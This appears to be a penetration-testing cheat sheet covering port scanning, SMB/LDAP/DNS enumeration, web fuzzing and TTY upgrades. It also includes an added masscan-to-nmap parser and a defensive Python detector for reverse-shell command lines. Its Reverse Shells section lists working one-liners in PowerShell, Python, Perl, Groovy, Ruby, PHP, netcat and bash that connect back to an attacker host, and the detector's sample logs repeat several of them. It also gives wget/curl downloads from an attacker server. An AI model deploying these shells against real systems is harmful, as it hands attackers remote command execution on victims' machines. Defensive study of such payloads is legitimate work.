Pentest Cheat Sheet

  1. Passive Scan
  2. Enumeration
  3. Exploitation
  4. Reverse Shells
  5. Privilege Escalation

Enumeration

Masscan & Nmap

A useful combination: masscan sweeps all TCP and UDP ports quickly, then only the ports it found open are handed to nmap for service and script enumeration.

# masscan prints one "Discovered open port 22/tcp on 127.0.0.1" line per open port; field 4 is port/proto
masscan -p1-65535,U:1-65535 127.0.0.1 --rate=1000 -i tun0 > ports
ports=$(awk '{print $4}' ports | awk -F "/" '{print $1}' | sort -n | uniq | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 127.0.0.1
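The awk pipeline above throws away the protocol, so UDP ports found by masscan end up in a TCP-only nmap run. The following Python script is an added example (not code from the original cheat sheet) that parses the same masscan stdout lines and builds one nmap port specification per host, using nmap's T:/U: prefixes so the two protocols stay separate. The masscan output embedded below is constructed, not a real scan.

```python
"""Turn masscan stdout into per-host nmap port specifications.

Added example; not from the original cheat sheet. It parses the
"Discovered open port <port>/<proto> on <ip>" lines that masscan prints
(the same lines the awk pipeline above reads as field 4) and builds one
nmap -p argument per host, keeping TCP and UDP apart with nmap's T:/U:
prefixes. The sample output below is constructed, not a real scan.
"""
import re
from collections import defaultdict

# Constructed masscan stdout: banner lines, a duplicate discovery, two hosts.
SAMPLE_OUTPUT = """\
Starting masscan (constructed sample banner)
Initiating SYN Stealth Scan
Discovered open port 22/tcp on 10.0.0.5
Discovered open port 80/tcp on 10.0.0.5
Discovered open port 53/udp on 10.0.0.5
Discovered open port 22/tcp on 10.0.0.5
Discovered open port 445/tcp on 10.0.0.7
"""

DISCOVERED_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<ip>\S+)$"
)


def parse_masscan(text):
    """Return {ip: {"tcp": set_of_ports, "udp": set_of_ports}}.

    Non-matching lines (banner, progress) are skipped; repeated discoveries
    of the same port collapse into the set, and out-of-range ports are dropped.
    """
    hosts = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for line in text.splitlines():
        match = DISCOVERED_RE.match(line.strip())
        if match is None:
            continue
        port = int(match.group("port"))
        if not 0 <= port <= 65535:
            continue
        hosts[match.group("ip")][match.group("proto")].add(port)
    return dict(hosts)


def nmap_port_spec(ports_by_proto):
    """Build an nmap -p value such as 'T:22,80,U:53'.

    In nmap's -p syntax a T: or U: prefix applies to every port that follows
    it until the next prefix, so TCP and UDP ports can share one argument.
    Ports are sorted and deduplicated; an empty result means nothing was open.
    """
    parts = []
    for prefix, proto in (("T", "tcp"), ("U", "udp")):
        ports = sorted(ports_by_proto.get(proto, ()))
        if ports:
            parts.append(prefix + ":" + ",".join(str(p) for p in ports))
    return ",".join(parts)


def nmap_commands(text, base_args="-Pn -sV -sC"):
    """One nmap command per host with open ports.

    nmap ignores U: ports unless a UDP scan type is present, so -sU (with
    -sS for the TCP side) is added only for hosts that have UDP ports.
    """
    commands = []
    for ip, protos in sorted(parse_masscan(text).items()):
        spec = nmap_port_spec(protos)
        if not spec:
            continue
        scan_types = " -sS -sU" if protos["udp"] else ""
        commands.append(f"nmap {base_args}{scan_types} -p{spec} {ip}")
    return commands


if __name__ == "__main__":
    for command in nmap_commands(SAMPLE_OUTPUT):
        print(command)
```

Feed it the `ports` file from the pipeline above (`nmap_commands(open("ports").read())`) and it emits one command per host; without `-sU` nmap would silently drop the U: part of the specification, which is the mistake the original one-liner makes.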

Masscan

-p     = ports
U:     = UDP port range (e.g. -pU:53)
-i     = interface
-vv    = verbosity
--rate = packets per second, i.e. scan speed
-oG    = grepable output ("o" for output, "G" for grepable), so I prefer to use it

# I generally start with this
masscan -p0-65535 -i tun0 -vv 127.0.0.1 --rate 1000 -oG masscan/masscan.tcp
masscan -pU:0-65535 -i tun0 -vv 127.0.0.1 --rate 1000 -oG masscan/masscan.udp

Nmap

-sV           = enumerate service versions
-sC           = default script scan
-vv           = verbosity
-oA <base>    = write output in all three formats (normal, grepable, XML) to <base>.nmap/.gnmap/.xml
-T5           = fastest (most aggressive) timing template
--script vuln = run the vuln category of NSE scripts

-p- (or -p1-65535) = all ports
nmap -sV -sC -vv -oA nmap/nmap 127.0.0.1

Web Content Discovery

# --hw 91 hides responses with 91 words (the baseline "not found" page)
wfuzz -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -H "Host: localhost" --hw 91 http://127.0.0.1/vuln.php?cmd=FUZZ

# -k skips TLS certificate verification (not used here)
# newer gobuster versions reject -s together with the default 404 blacklist; add -b "" in that case
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://127.0.0.1 -t 20 -x php~,html,txt,php -s 200,204,301,302,307,401,403

nikto -h morph3sec.com

SMB

# list all shares
# -N = no password (null session)
smbclient -N -L \\\\127.0.0.1\\
# show the ACL of the root of the Users share (smbcacls wants //server/share followed by a path)
smbcacls -N //127.0.0.1/Users /
# smbmap gives really good info about shares
smbmap -u morph3 -p pass1234 -d ECORP -H 127.0.0.1
smbmap -u invaliduser 127.0.0.1

LDAP

# initial query: list the naming contexts, then dump the whole tree
ldapsearch -x -h domain.name -s base namingcontexts
ldapsearch -x -h domain.name -s sub -b 'DC=DOMAIN,DC=NAME'

DNS Zone Transfer

dig axfr @TheDNSServerYouWantToAsk domain

Exploitation

Spawning TTY Shell

python -c 'import pty; pty.spawn("/bin/sh")'
ctrl+z                --> background the shell
stty raw -echo; fg    --> put the local terminal in raw mode, then bring the shell back
# the listener that caught the shell in the first place
nc -nvlp 4444

Searchsploit

searchsploit exploitName

Reverse Shells

Powershell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'use Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Java

// Groovy syntax (untyped variables, "as String[]"); plain Java needs typed declarations
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ruby

ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PHP

php -r '$sock=fsockopen("ATTACKER_IP",ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

netcat

nc -e /bin/sh ATTACKER_IP ATTACKER_PORT

bash

bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
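Seen from the blue-team side, every one-liner in this section carries a marker it cannot do without: the shell's /dev/tcp pseudo-device, python's pty.spawn, netcat's -e, or a socket call paired with exec. The script below is an added example (not part of the original cheat sheet) that turns those markers into detection rules and runs them over process-execution log lines. The log format, hostnames, users and the listener address 203.0.113.9 are all constructed for the example.

```python
"""Flag reverse-shell one-liners in process-execution logs.

Added example from the defensive side; not part of the original cheat
sheet. Each rule is a regular expression for a marker that the one-liners
in the Reverse Shells section cannot do without: the shell's /dev/tcp
pseudo-device, python's pty.spawn, netcat's -e, and the socket-plus-exec
pairs of the PHP, Ruby, Perl and PowerShell variants. The log lines are
constructed for this example in the form "<timestamp> <host> <user> <cmdline>";
203.0.113.9 is a documentation address standing in for a listener.
"""
import re

# (rule name, pattern). The list order is the order of names in a hit.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("python_pty_spawn", re.compile(r"\bpty\.spawn\(")),
    ("netcat_exec", re.compile(r"\bnc\b.*\s-e\s+\S*sh\b")),
    ("php_fsockopen_exec", re.compile(r"fsockopen\(.*\bexec\(")),
    ("ruby_tcpsocket_exec", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("perl_socket_exec", re.compile(r"use Socket;.*\bexec\(")),
    ("powershell_tcpclient_iex",
     re.compile(r"System\.Net\.Sockets\.TCPClient.*\biex\b", re.IGNORECASE)),
]

# Constructed log: five malicious executions and two benign ones.
SAMPLE_LOG = [
    "2024-01-01T00:00:01Z web01 www-data bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
    "2024-01-01T00:00:02Z web01 www-data python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"203.0.113.9\",4444));"
    "os.dup2(s.fileno(),0);import pty; pty.spawn(\"/bin/bash\")'",
    "2024-01-01T00:00:03Z db01 postgres nc -zv 10.0.0.20 5432",
    "2024-01-01T00:00:04Z web01 www-data nc -e /bin/sh 203.0.113.9 4444",
    "2024-01-01T00:00:05Z app01 deploy php -r '$sock=fsockopen(\"203.0.113.9\",4444);"
    "exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "2024-01-01T00:00:06Z app01 deploy git pull origin main",
    "2024-01-01T00:00:07Z win01 svc powershell -nop -c \"$client = New-Object "
    "System.Net.Sockets.TCPClient('203.0.113.9',4444);$sendback = (iex $data 2>&1 | Out-String)\"",
]


def classify(cmdline):
    """Names of all rules whose pattern occurs in the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan_log(lines):
    """Return one hit per matching log line, keeping who ran what and where."""
    hits = []
    for line in lines:
        fields = line.split(" ", 3)
        if len(fields) < 4:  # malformed line without a command field
            continue
        timestamp, host, user, cmdline = fields
        names = classify(cmdline)
        if names:
            hits.append({"ts": timestamp, "host": host, "user": user, "rules": names})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["host"]} {hit["user"]}: {", ".join(hit["rules"])}')
```

The port probe `nc -zv` and the `git pull` pass through, and the five shells are each attributed to a host and user. The rules match the literal forms on this page only: a base64-encoded PowerShell command or a one-liner assembled from variables carries none of these strings, so in practice this pattern set belongs beside network-level checks (an outbound connection opened by a shell or interpreter process), not in place of them.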

Priv Esc

wget

wget http://ATTACKER_SERVER/example.txt -O example.txt

cURL

curl http://ATTACKER_SERVER/example.txt -o example.txt

Linux Priv Esc

Searching

Searching for a file with a name pattern

find / -name "*pattern*"

Recursive string scan

# -r recursive, -n print line numbers, -w match whole words only
grep -rnw '/path/to/somewhere/' -e 'pattern'